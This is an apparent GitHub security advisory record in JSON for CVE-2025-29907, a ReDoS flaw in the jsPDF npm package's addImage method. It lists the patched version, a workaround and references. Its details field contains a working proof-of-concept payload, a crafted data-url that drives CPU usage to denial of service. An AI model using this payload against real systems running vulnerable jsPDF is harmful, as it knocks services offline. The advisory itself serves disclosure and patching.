{
  "schema_version": "1.4.0",
  "id": "GHSA-w532-jxjh-hjhj",
  "modified": "2025-03-19T05:58:35Z",
  "published": "2025-03-18T21:07:47Z",
  "aliases": [
    "CVE-2025-29907"
  ],
  "summary": "jsPDF Bypass Regular Expression Denial of Service (ReDoS)",
  "details": "### Impact\nUser control of the first argument of the `addImage` method results in CPU utilization and denial of service.\n\nIf given the possibility to pass unsanitized image urls to the `addImage` method, a user can provide a harmful data-url that results in high CPU utilization and denial of service.\n\nOther affected methods are: `html`, `addSvgAsImage`.\n\nExample payload:\n```js\nimport { jsPDF } from \"jpsdf\" \n\nconst doc = new jsPDF();\nconst payload = 'data:/charset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=s\\x00base64,undefined';\n\nconst startTime = performance.now()\n\ntry {\n doc.addImage(payload, \"PNG\", 10, 40, 180, 180, undefined, \"SLOW\");\n} catch (err) {\n  const endTime = performance.now()\n  console.log(`Call to doc.addImage took ${endTime - startTime} milliseconds`)\n}\n\ndoc.save(\"a4.pdf\");\n```\n\n### Patches\nThe vulnerability was fixed in jsPDF 3.0.1. Upgrade to jspdf@>=3.0.1\n\n### Workarounds\nSanitize image urls before passing it to the `addImage` method or one of the other affected methods.\n\n### Credits\nResearcher: Aleksey Solovev (Positive Technologies)",
  "severity": [
    {
      "type": "CVSS_V4",
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"
    }
  ],
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "jspdf"
      },
      "ranges": [
        {
          "type": "ECOSYSTEM",
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.0.1"
            }
          ]
        }
      ]
    }
  ],
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/parallax/jsPDF/security/advisories/GHSA-w532-jxjh-hjhj"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-29907"
    },
    {
      "type": "WEB",
      "url": "https://github.com/parallax/jsPDF/commit/b167c43c27c466eb914b927885b06073708338df"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/parallax/jsPDF"
    }
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400",
      "CWE-770"
    ],
    "severity": "HIGH",
    "github_reviewed": true,
    "github_reviewed_at": "2025-03-18T21:07:47Z",
    "nvd_published_at": "2025-03-18T19:15:51Z"
  }
}